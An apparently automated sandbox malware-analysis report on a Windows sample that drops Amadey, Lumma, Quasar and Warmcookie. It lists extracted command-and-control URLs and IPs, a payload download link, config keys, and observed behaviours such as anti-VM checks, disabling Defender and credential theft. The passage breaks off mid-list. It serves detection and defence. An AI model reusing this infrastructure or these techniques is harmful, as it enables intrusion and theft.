Analysis
-
max time kernel
150s -
max time network
151s -
platform
windows10-2004_x64 -
resource
win10v2004-20250314-en -
resource tags
arch:x64arch:x86image:win10v2004-20250314-enlocale:en-usos:windows10-2004-x64system -
submitted
01/04/2025, 17:40
Static task
static1
Behavioral task
behavioral1
Sample
2025-04-01_1cbc80c77a01e855f05fe33a43a8e977_agent-tesla_black-basta_cobalt-strike_luca-stealer.exe
Resource
win10v2004-20250314-en
General
-
Target
2025-04-01_1cbc80c77a01e855f05fe33a43a8e977_agent-tesla_black-basta_cobalt-strike_luca-stealer.exe
-
Size
938KB
-
MD5
1cbc80c77a01e855f05fe33a43a8e977
-
SHA1
1db146c4e6de2e346c0691144cfa17147fc55815
-
SHA256
78ff4b03b39c789d662f42471312a413b005f73e496a42d4b5e7b8e18cfa84b4
-
SHA512
453374671899392bf93fa9ea6b1070fd0981832d120092c3c9a839e43438189e8612b487b31bb35ab50595eb5f878c377a23469d746ebb56994d560e4742d91b
-
SSDEEP
24576:TqDEvCTbMWu7rQYlBQcBiT6rprG8a0Nu:TTvC/MTQYxsWR7a0N
Malware Config
Extracted
http://176.113.115.7/mine/random.exe
Extracted
amadey
5.21
092155
http://176.113.115.6
-
install_dir
bb556cff4a
-
install_file
rapes.exe
-
strings_key
a131b127e996a898cd19ffb2d92e481b
-
url_paths
/Ni9kiput/index.php
Extracted
lumma
https://rodformi.run/aUosoz
https://metalsyo.digital/opsa
https://ironloxp.live/aksdd
https://navstarx.shop/FoaJSi
https://starcloc.bet/GOksAo
https://advennture.top/GKsiio
https://targett.top/dsANGt
https://spacedbv.world/EKdlsk
https://galxnetb.today/GsuIAo
https://hadvennture.top/GKsiio
https://anavstarx.shop/FoaJSi
https://wstarcloc.bet/GOksAo
https://atargett.top/dsANGt
Extracted
quasar
1.4.1
CyberPunk
dakar.wohowoho.com:443
dakar.wohowoho.com:80
206.206.76.75:443
206.206.76.75:80
62.60.226.176:80
62.60.226.176:443
5e809a5b-bb22-41b6-af20-5285e99040d3
-
encryption_key
A98DEEE2D49BDF1C5183B3079E9B28E281586F6F
-
install_name
chrome.exe
-
log_directory
Logs
-
reconnect_delay
30000
-
startup_key
GoogleChrome
-
subdirectory
Google\Chrome
Extracted
amadey
5.33
faec90
-
install_dir
52907c9546
-
install_file
tgvazx.exe
-
strings_key
cc9d94f7503394295f4824f8cfd50608
-
url_paths
/Di0Her478/index.php
Extracted
warmcookie
192.36.57.50
-
mutex
62580f79-f0e4-46c9-9fe6-041328dce2b7
-
user_agent
Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:109.0) Gecko/20100101 Firefox/115.0
Signatures
-
Amadey family
-
Lumma family
-
Modifies security service 2 TTPs 2 IoCs
description ioc Process Key deleted \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wscsvc\Parameters reg.exe Key deleted \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wscsvc\Security reg.exe -
Quasar family
-
Quasar payload 2 IoCs
resource yara_rule behavioral1/files/0x000800000002431d-170.dat family_quasar behavioral1/memory/2688-183-0x0000000000860000-0x0000000000B82000-memory.dmp family_quasar -
Suspicious use of NtCreateUserProcessOtherParentProcess 3 IoCs
description pid Process procid_target PID 5676 created 2616 5676 Abspawnhlp.exe 44 PID 1772 created 2616 1772 CamMenuMaker.exe 44 PID 5844 created 2616 5844 MSBuild.exe 44 -
Warmcookie family
-
Warmcookie, Badspace
Warmcookie aka Badspace is a backdoor written in C++.
-
Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs 7 IoCs
description ioc Process Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ rapes.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ 31ccec37c4.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ TempRYG1HCKJMQRKDB89IPOYX9TD945Q4YBU.EXE Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ rapes.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ 12c306b2f8.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ rapes.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ b316c3b86e.exe -
Blocklisted process makes network request 2 IoCs
flow pid Process 22 4440 powershell.exe 112 3136 powershell.exe -
Command and Scripting Interpreter: PowerShell 1 TTPs 3 IoCs
Run Powershell and hide display window.
pid Process 4440 powershell.exe 5952 powershell.exe 1352 powershell.exe -
Creates new service(s) 2 TTPs
-
Downloads MZ/PE file 14 IoCs
flow pid Process 42 1568 rapes.exe 42 1568 rapes.exe 42 1568 rapes.exe 42 1568 rapes.exe 89 5876 Abspawnhlp.exe 89 5876 Abspawnhlp.exe 89 5876 Abspawnhlp.exe 89 5876 Abspawnhlp.exe 97 1568 rapes.exe 124 1568 rapes.exe 22 4440 powershell.exe 33 1568 rapes.exe 86 1568 rapes.exe 112 3136 powershell.exe -
Possible privilege escalation attempt 2 IoCs
pid Process 5852 takeown.exe 4016 icacls.exe -
Stops running service(s) 4 TTPs
-
Checks BIOS information in registry 2 TTPs 14 IoCs
BIOS information is often read in order to detect sandboxing environments.
description ioc Process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion b316c3b86e.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion rapes.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion 31ccec37c4.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion 31ccec37c4.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion TempRYG1HCKJMQRKDB89IPOYX9TD945Q4YBU.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion rapes.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion rapes.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion 12c306b2f8.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion 12c306b2f8.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion rapes.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion b316c3b86e.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion rapes.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion TempRYG1HCKJMQRKDB89IPOYX9TD945Q4YBU.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion rapes.exe -
Checks computer location settings 2 TTPs 12 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-3342763580-2723508992-2885672917-1000\Control Panel\International\Geo\Nation 261.exe Key value queried \REGISTRY\USER\S-1-5-21-3342763580-2723508992-2885672917-1000\Control Panel\International\Geo\Nation LXUZVRLG.exe Key value queried \REGISTRY\USER\S-1-5-21-3342763580-2723508992-2885672917-1000\Control Panel\International\Geo\Nation mshta.exe Key value queried \REGISTRY\USER\S-1-5-21-3342763580-2723508992-2885672917-1000\Control Panel\International\Geo\Nation TempRYG1HCKJMQRKDB89IPOYX9TD945Q4YBU.EXE Key value queried \REGISTRY\USER\S-1-5-21-3342763580-2723508992-2885672917-1000\Control Panel\International\Geo\Nation rapes.exe Key value queried \REGISTRY\USER\S-1-5-21-3342763580-2723508992-2885672917-1000\Control Panel\International\Geo\Nation apple.exe Key value queried \REGISTRY\USER\S-1-5-21-3342763580-2723508992-2885672917-1000\Control Panel\International\Geo\Nation Abspawnhlp.exe Key value queried \REGISTRY\USER\S-1-5-21-3342763580-2723508992-2885672917-1000\Control Panel\International\Geo\Nation Abspawnhlp.exe Key value queried \REGISTRY\USER\S-1-5-21-3342763580-2723508992-2885672917-1000\Control Panel\International\Geo\Nation KRWXARXD.exe Key value queried \REGISTRY\USER\S-1-5-21-3342763580-2723508992-2885672917-1000\Control Panel\International\Geo\Nation PQPYAYJJ.exe Key value queried \REGISTRY\USER\S-1-5-21-3342763580-2723508992-2885672917-1000\Control Panel\International\Geo\Nation PQPYAYJJ.exe Key value queried \REGISTRY\USER\S-1-5-21-3342763580-2723508992-2885672917-1000\Control Panel\International\Geo\Nation 261.exe -
Executes dropped EXE 43 IoCs
pid Process 3964 TempRYG1HCKJMQRKDB89IPOYX9TD945Q4YBU.EXE 1568 rapes.exe 5184 PQPYAYJJ.exe 5680 Abspawnhlp.exe 340 Abspawnhlp.exe 4460 h8NlU62.exe 2688 NHq7LaU.exe 4068 chrome.exe 760 qWR3lUj.exe 3964 HAe88WC.exe 5220 apple.exe 1892 261.exe 5964 261.exe 4536 12c306b2f8.exe 5948 Abspawnhlp.exe 5288 Abspawnhlp.exe 6084 LXUZVRLG.exe 1968 HAe88WC.exe 5532 rapes.exe 2008 Abspawnhlp.exe 1052 890172171_x64.exe 3044 b316c3b86e.exe 5964 CamMenuMaker.exe 5004 CamMenuMaker.exe 6132 Abspawnhlp.exe 2232 CamMenuMaker.exe 4356 CamMenuMaker.exe 2344 IEYKSCXV.exe 3452 KRWXARXD.exe 4492 CamMenuMaker.exe 5224 Updater.exe 4588 rapes.exe 1924 PQPYAYJJ.exe 3152 Abspawnhlp.exe 5628 Abspawnhlp.exe 2012 HelpLink.exe 3244 datAF33.exe 1940 Abspawnhlp.exe 4856 Abspawnhlp.exe 3508 31ccec37c4.exe 2752 svchost015.exe 3212 TbV75ZR.exe 800 h8NlU62.exe -
Identifies Wine through registry keys 2 TTPs 7 IoCs
Wine is a compatibility layer capable of running Windows applications, which can be used as sandboxing environment.
description ioc Process Key opened \REGISTRY\USER\S-1-5-21-3342763580-2723508992-2885672917-1000\Software\Wine TempRYG1HCKJMQRKDB89IPOYX9TD945Q4YBU.EXE Key opened \REGISTRY\USER\S-1-5-21-3342763580-2723508992-2885672917-1000\Software\Wine rapes.exe Key opened \REGISTRY\USER\S-1-5-21-3342763580-2723508992-2885672917-1000\Software\Wine 12c306b2f8.exe Key opened \REGISTRY\USER\S-1-5-21-3342763580-2723508992-2885672917-1000\Software\Wine rapes.exe Key opened \REGISTRY\USER\S-1-5-21-3342763580-2723508992-2885672917-1000\Software\Wine b316c3b86e.exe Key opened \REGISTRY\USER\S-1-5-21-3342763580-2723508992-2885672917-1000\Software\Wine rapes.exe Key opened \REGISTRY\USER\S-1-5-21-3342763580-2723508992-2885672917-1000\Software\Wine 31ccec37c4.exe -
Loads dropped DLL 64 IoCs
pid Process 5680 Abspawnhlp.exe 5680 Abspawnhlp.exe 5680 Abspawnhlp.exe 5680 Abspawnhlp.exe 5680 Abspawnhlp.exe 340 Abspawnhlp.exe 340 Abspawnhlp.exe 340 Abspawnhlp.exe 340 Abspawnhlp.exe 340 Abspawnhlp.exe 5876 Abspawnhlp.exe 5948 Abspawnhlp.exe 5948 Abspawnhlp.exe 5948 Abspawnhlp.exe 5948 Abspawnhlp.exe 5948 Abspawnhlp.exe 5288 Abspawnhlp.exe 5288 Abspawnhlp.exe 5288 Abspawnhlp.exe 5288 Abspawnhlp.exe 5288 Abspawnhlp.exe 2008 Abspawnhlp.exe 2008 Abspawnhlp.exe 2008 Abspawnhlp.exe 2008 Abspawnhlp.exe 2008 Abspawnhlp.exe 5964 CamMenuMaker.exe 5964 CamMenuMaker.exe 5964 CamMenuMaker.exe 5964 CamMenuMaker.exe 5964 CamMenuMaker.exe 5004 CamMenuMaker.exe 5004 CamMenuMaker.exe 5004 CamMenuMaker.exe 5004 CamMenuMaker.exe 4772 Abspawnhlp.exe 5676 Abspawnhlp.exe 2232 CamMenuMaker.exe 2232 CamMenuMaker.exe 2232 CamMenuMaker.exe 2232 CamMenuMaker.exe 4356 CamMenuMaker.exe 4356 CamMenuMaker.exe 4356 CamMenuMaker.exe 4356 CamMenuMaker.exe 4492 CamMenuMaker.exe 4492 CamMenuMaker.exe 4492 CamMenuMaker.exe 4492 CamMenuMaker.exe 1772 CamMenuMaker.exe 3928 CamMenuMaker.exe 3152 Abspawnhlp.exe 3152 Abspawnhlp.exe 3152 Abspawnhlp.exe 3152 Abspawnhlp.exe 3152 Abspawnhlp.exe 5628 Abspawnhlp.exe 5628 Abspawnhlp.exe 5628 Abspawnhlp.exe 5628 Abspawnhlp.exe 5628 Abspawnhlp.exe 1940 Abspawnhlp.exe 1940 Abspawnhlp.exe 1940 Abspawnhlp.exe -
Modifies file permissions 1 TTPs 2 IoCs
pid Process 5852 takeown.exe 4016 icacls.exe -
Reads user/profile data of local email clients 2 TTPs
Email clients store some user data on disk where infostealers will often target it.
-
Reads user/profile data of web browsers 3 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
-
Enumerates connected drives 3 TTPs 23 IoCs
Attempts to read the root path of hard drives other than the default C: drive.
description ioc Process File opened (read-only) \??\B: msiexec.exe File opened (read-only) \??\J: msiexec.exe File opened (read-only) \??\L: msiexec.exe File opened (read-only) \??\R: msiexec.exe File opened (read-only) \??\U: msiexec.exe File opened (read-only) \??\X: msiexec.exe File opened (read-only) \??\G: msiexec.exe File opened (read-only) \??\K: msiexec.exe File opened (read-only) \??\N: msiexec.exe File opened (read-only) \??\S: msiexec.exe File opened (read-only) \??\V: msiexec.exe File opened (read-only) \??\A: msiexec.exe File opened (read-only) \??\E: msiexec.exe File opened (read-only) \??\I: msiexec.exe File opened (read-only) \??\Q: msiexec.exe File opened (read-only) \??\H: msiexec.exe File opened (read-only) \??\M: msiexec.exe File opened (read-only) \??\O: msiexec.exe File opened (read-only) \??\P: msiexec.exe File opened (read-only) \??\T: msiexec.exe File opened (read-only) \??\W: msiexec.exe File opened (read-only) \??\Y: msiexec.exe File opened (read-only) \??\Z: msiexec.exe -
Drops file in System32 directory 29 IoCs
description ioc Process File created C:\Windows\SysWOW64\config\systemprofile\libssl-1_1.dll datAF33.exe File created C:\Windows\SysWOW64\config\systemprofile\AppData\Local\svcPower_test\msvcp80.dll Abspawnhlp.exe File created C:\Windows\SysWOW64\config\systemprofile\AppData\Local\svcPower_test\declarator.txt Abspawnhlp.exe File created C:\Windows\SysWOW64\config\systemprofile\Abspawnhlp.exe datAF33.exe File created C:\Windows\SysWOW64\config\systemprofile\Comn.dll datAF33.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\svcPower_test\Abspawnhlp.exe Abspawnhlp.exe File created C:\Windows\SysWOW64\config\systemprofile\AppData\Local\svcPower_test\Comn.dll Abspawnhlp.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\Abspawnhlp.exe datAF33.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\Comn.dll datAF33.exe File created C:\Windows\SysWOW64\config\systemprofile\libcrypto-1_1.dll datAF33.exe File created C:\Windows\SysWOW64\config\systemprofile\msvcp80.dll datAF33.exe File created C:\Windows\SysWOW64\config\systemprofile\AppData\Local\svcPower_test\buttercup.swf Abspawnhlp.exe File created C:\Windows\SysWOW64\config\systemprofile\AppData\Local\svcPower_test\msvcr80.dll Abspawnhlp.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\buttercup.swf datAF33.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\msvcr80.dll datAF33.exe File created C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\INetCache\IE\RI6VXUU5.htm Updater.exe File created C:\Windows\SysWOW64\config\systemprofile\buttercup.swf datAF33.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\libssl-1_1.dll datAF33.exe File created C:\Windows\SysWOW64\config\systemprofile\msvcr80.dll datAF33.exe File created C:\Windows\SysWOW64\config\systemprofile\declarator.txt datAF33.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\declarator.txt datAF33.exe File created C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\INetCache\IE\9W9YWRJ0.htm Updater.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\Package datAF33.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\RMS_RDP_1 datAF33.exe File created C:\Windows\SysWOW64\config\systemprofile\AppData\Local\svcPower_test\Abspawnhlp.exe Abspawnhlp.exe File created C:\Windows\SysWOW64\config\systemprofile\AppData\Local\svcPower_test\libcrypto-1_1.dll Abspawnhlp.exe File created C:\Windows\SysWOW64\config\systemprofile\AppData\Local\svcPower_test\libssl-1_1.dll Abspawnhlp.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\libcrypto-1_1.dll datAF33.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\msvcp80.dll datAF33.exe -
Suspicious use of NtSetInformationThreadHideFromDebugger 7 IoCs
pid Process 3964 TempRYG1HCKJMQRKDB89IPOYX9TD945Q4YBU.EXE 1568 rapes.exe 4536 12c306b2f8.exe 5532 rapes.exe 3044 b316c3b86e.exe 4588 rapes.exe 3508 31ccec37c4.exe -
Suspicious use of SetThreadContext 18 IoCs
description pid Process procid_target PID 4460 set thread context of 5852 4460 h8NlU62.exe 108 PID 340 set thread context of 5876 340 Abspawnhlp.exe 109 PID 760 set thread context of 3252 760 qWR3lUj.exe 119 PID 3964 set thread context of 4908 3964 HAe88WC.exe 131 PID 340 set thread context of 3824 340 Abspawnhlp.exe 121 PID 1968 set thread context of 5764 1968 HAe88WC.exe 209 PID 5288 set thread context of 4772 5288 Abspawnhlp.exe 213 PID 2008 set thread context of 5676 2008 Abspawnhlp.exe 214 PID 5876 set thread context of 6132 5876 Abspawnhlp.exe 220 PID 2008 set thread context of 3152 2008 Abspawnhlp.exe 225 PID 5288 set thread context of 5880 5288 Abspawnhlp.exe 229 PID 4356 set thread context of 2264 4356 CamMenuMaker.exe 241 PID 5004 set thread context of 4036 5004 CamMenuMaker.exe 238 PID 4492 set thread context of 1052 4492 CamMenuMaker.exe 247 PID 5628 set thread context of 5208 5628 Abspawnhlp.exe 259 PID 3508 set thread context of 2752 3508 31ccec37c4.exe 264 PID 800 set thread context of 1892 800 h8NlU62.exe 275 PID 4856 set thread context of 2428 4856 Abspawnhlp.exe 269 -
Drops file in Program Files directory 64 IoCs
description ioc Process File opened for modification C:\Program Files\Windows Defender\fr-FR\MpAsDesc.dll.mui cmd.exe File opened for modification C:\Program Files (x86)\Windows Defender\ja-JP\MpAsDesc.dll.mui cmd.exe File opened for modification C:\Program Files\Windows Defender\fr-FR\OfflineScannerShell.exe.mui cmd.exe File opened for modification C:\Program Files (x86)\Windows Defender\fr-FR\MpAsDesc.dll.mui cmd.exe File opened for modification C:\Program Files (x86)\Windows Defender\ja-JP\EppManifest.dll.mui cmd.exe File opened for modification C:\Program Files\Windows Defender\de-DE\ProtectionManagement_Uninstall.mfl cmd.exe File opened for modification C:\Program Files\Windows Defender\de-DE\shellext.dll.mui cmd.exe File opened for modification C:\Program Files\Windows Defender\it-IT\MpAsDesc.dll.mui cmd.exe File opened for modification C:\Program Files\Windows Defender\it-IT\OfflineScannerShell.exe.mui cmd.exe File opened for modification C:\Program Files (x86)\Windows Defender\it-IT\EppManifest.dll.mui cmd.exe File opened for modification C:\Program Files\Windows Defender\de-DE\MpEvMsg.dll.mui cmd.exe File opened for modification C:\Program Files\Windows Defender\it-IT\ProtectionManagement_Uninstall.mfl cmd.exe File opened for modification C:\Program Files\Windows Defender\uk-UA\shellext.dll.mui cmd.exe File opened for modification C:\Program Files (x86)\Windows Defender\es-ES\EppManifest.dll.mui cmd.exe File opened for modification C:\Program Files\Windows Defender\es-ES\ProtectionManagement_Uninstall.mfl cmd.exe File opened for modification C:\Program Files\Windows Defender\fr-FR\ProtectionManagement_Uninstall.mfl cmd.exe File opened for modification C:\Program Files\Windows Defender\uk-UA\OfflineScannerShell.exe.mui cmd.exe File opened for modification C:\Program Files (x86)\Windows Defender\de-DE\MpAsDesc.dll.mui cmd.exe File opened for modification C:\Program Files\Windows Defender\de-DE\OfflineScannerShell.exe.mui cmd.exe File opened for modification C:\Program Files\Windows Defender\es-ES\EppManifest.dll.mui cmd.exe File opened for modification C:\Program Files\Windows Defender\fr-FR\EppManifest.dll.mui cmd.exe File opened for modification C:\Program Files\Windows Defender\ja-JP\shellext.dll.mui cmd.exe File opened for modification C:\Program Files\Windows Defender\de-DE\ProtectionManagement.mfl cmd.exe File opened for modification C:\Program Files\Windows Defender\es-ES\MpEvMsg.dll.mui cmd.exe File opened for modification C:\Program Files\Windows Defender\fr-FR\MpEvMsg.dll.mui cmd.exe File opened for modification C:\Program Files\Windows Defender\fr-FR\ProtectionManagement.dll.mui cmd.exe File opened for modification C:\Program Files\Windows Defender\fr-FR\ProtectionManagement.mfl cmd.exe File opened for modification C:\Program Files\Windows Defender\ja-JP\ProtectionManagement.mfl cmd.exe File opened for modification C:\Program Files\Windows Defender\ja-JP\ProtectionManagement_Uninstall.mfl cmd.exe File opened for modification C:\Program Files (x86)\Windows Defender\es-ES\MpAsDesc.dll.mui cmd.exe File opened for modification C:\Program Files\Windows Defender\de-DE\MsMpRes.dll.mui cmd.exe File opened for modification C:\Program Files\Windows Defender\es-ES\MpAsDesc.dll.mui cmd.exe File opened for modification C:\Program Files\Windows Defender\es-ES\OfflineScannerShell.exe.mui cmd.exe File opened for modification C:\Program Files\Windows Defender\es-ES\ProtectionManagement.mfl cmd.exe File opened for modification C:\Program Files\Windows Defender\fr-FR\MsMpRes.dll.mui cmd.exe File opened for modification C:\Program Files\Windows Defender\it-IT\MsMpRes.dll.mui cmd.exe File opened for modification C:\Program Files\Windows Defender\de-DE\EppManifest.dll.mui cmd.exe File opened for modification C:\Program Files\Windows Defender\it-IT\MpEvMsg.dll.mui cmd.exe File opened for modification C:\Program Files\Windows Defender\it-IT\ProtectionManagement.mfl cmd.exe File opened for modification C:\Program Files (x86)\Windows Defender\fr-FR\EppManifest.dll.mui cmd.exe File opened for modification C:\Program Files\Windows Defender\es-ES\ProtectionManagement.dll.mui cmd.exe File opened for modification C:\Program Files\Windows Defender\it-IT\EppManifest.dll.mui cmd.exe File opened for modification C:\Program Files\Windows Defender\ja-JP\ProtectionManagement.dll.mui cmd.exe File opened for modification C:\Program Files (x86)\Windows Defender\it-IT\MpAsDesc.dll.mui cmd.exe File opened for modification C:\Program Files\Windows Defender\ja-JP\EppManifest.dll.mui cmd.exe File opened for modification C:\Program Files\Windows Defender\ja-JP\MsMpRes.dll.mui cmd.exe File opened for modification C:\Program Files\Windows Defender\uk-UA\ProtectionManagement_Uninstall.mfl cmd.exe File opened for modification C:\Program Files\Windows Defender\uk-UA\MsMpRes.dll.mui cmd.exe File opened for modification C:\Program Files\Windows Defender\uk-UA\ProtectionManagement.mfl cmd.exe File opened for modification C:\Program Files\Windows Defender\it-IT\ProtectionManagement.dll.mui cmd.exe File opened for modification C:\Program Files\Windows Defender\uk-UA\ProtectionManagement.dll.mui cmd.exe File opened for modification C:\Program Files (x86)\Windows Defender\de-DE\EppManifest.dll.mui cmd.exe File opened for modification C:\Program Files\Windows Defender\es-ES\MsMpRes.dll.mui cmd.exe File opened for modification C:\Program Files\Windows Defender\it-IT\shellext.dll.mui cmd.exe File opened for modification C:\Program Files\Windows Defender\ja-JP\MpEvMsg.dll.mui cmd.exe File opened for modification C:\Program Files\Windows Defender\uk-UA\MpAsDesc.dll.mui cmd.exe File opened for modification C:\Program Files (x86)\Windows Defender\uk-UA\MpAsDesc.dll.mui cmd.exe File opened for modification C:\Program Files\Windows Defender\de-DE\MpAsDesc.dll.mui cmd.exe File opened for modification C:\Program Files\Windows Defender\fr-FR\shellext.dll.mui cmd.exe File opened for modification C:\Program Files\Windows Defender\ja-JP\MpAsDesc.dll.mui cmd.exe File opened for modification C:\Program Files\Windows Defender\uk-UA\EppManifest.dll.mui cmd.exe File opened for modification C:\Program Files\Windows Defender\ja-JP\OfflineScannerShell.exe.mui cmd.exe File opened for modification C:\Program Files (x86)\Windows Defender\uk-UA\EppManifest.dll.mui cmd.exe File opened for modification C:\Program Files\Windows Defender\de-DE\ProtectionManagement.dll.mui cmd.exe -
Drops file in Windows directory 24 IoCs
description ioc Process File created C:\Windows\Tasks\controladvanced_MKO_test.job cmd.exe File created C:\Windows\Tasks\Protecttls.job cmd.exe File opened for modification C:\Windows\Installer\e586f7e.msi msiexec.exe File created C:\Windows\Tasks\hedgehog lab.job 890172171_x64.exe File created C:\Windows\Installer\e586f88.msi msiexec.exe File created C:\Windows\Installer\SourceHash{2EF5B19F-6B07-454C-9A55-639BDA404CDF} msiexec.exe File created C:\Windows\Installer\e586f8c.msi msiexec.exe File created C:\Windows\Installer\SourceHash{A96A5C12-2BA0-4882-B94A-BED0ECDD226E} msiexec.exe File created C:\Windows\Tasks\rapes.job TempRYG1HCKJMQRKDB89IPOYX9TD945Q4YBU.EXE File created C:\Windows\Installer\e586f7e.msi msiexec.exe File opened for modification C:\Windows\Installer\ msiexec.exe File created C:\Windows\Installer\e586f87.msi msiexec.exe File opened for modification C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.log msiexec.exe File created C:\Windows\Installer\e586f82.msi msiexec.exe File opened for modification C:\Windows\Installer\e586f83.msi msiexec.exe File opened for modification C:\Windows\Installer\e586f88.msi msiexec.exe File opened for modification C:\Windows\Installer\MSID1D4.tmp msiexec.exe File created C:\Windows\Tasks\ctrlTask.job cmd.exe File opened for modification C:\Windows\Installer\MSIB504.tmp msiexec.exe File created C:\Windows\Installer\inprogressinstallinfo.ipi msiexec.exe File created C:\Windows\Installer\SourceHash{37BD7FCD-CFF5-41A4-855A-AA18B2383F73} msiexec.exe File opened for modification C:\Windows\Installer\MSI723D.tmp msiexec.exe File created C:\Windows\Tasks\httpTool_alpha.job cmd.exe File created C:\Windows\Installer\e586f83.msi msiexec.exe -
Launches sc.exe 38 IoCs
Sc.exe is a Windows utlilty to control services on the system.
pid Process 2720 sc.exe 2604 sc.exe 3452 sc.exe 4776 sc.exe 2020 sc.exe 2688 sc.exe 4648 sc.exe 1156 sc.exe 4504 sc.exe 4672 sc.exe 800 sc.exe 5100 sc.exe 1052 sc.exe 844 sc.exe 4036 sc.exe 2668 sc.exe 3940 sc.exe 2672 sc.exe 5676 sc.exe 3708 sc.exe 2132 sc.exe 4292 sc.exe 4368 sc.exe 5380 sc.exe 5812 sc.exe 2612 sc.exe 1056 sc.exe 6068 sc.exe 5800 sc.exe 5756 sc.exe 4772 sc.exe 4332 sc.exe 4740 sc.exe 1348 sc.exe 2104 sc.exe 1060 sc.exe 4516 sc.exe 5052 sc.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Program crash 2 IoCs
pid pid_target Process procid_target 6012 6132 WerFault.exe 220 1860 5844 WerFault.exe 268 -
System Location Discovery: System Language Discovery 1 TTPs 60 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language PQPYAYJJ.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 12c306b2f8.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Abspawnhlp.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language msiexec.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Abspawnhlp.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language KRWXARXD.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language CamMenuMaker.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language CamMenuMaker.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language CamMenuMaker.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language MSBuild.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language b316c3b86e.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language MSBuild.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 2025-04-01_1cbc80c77a01e855f05fe33a43a8e977_agent-tesla_black-basta_cobalt-strike_luca-stealer.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language MSBuild.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 261.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language LXUZVRLG.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language msiexec.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Abspawnhlp.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language fontdrvhost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language mshta.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language schtasks.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language svchost015.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 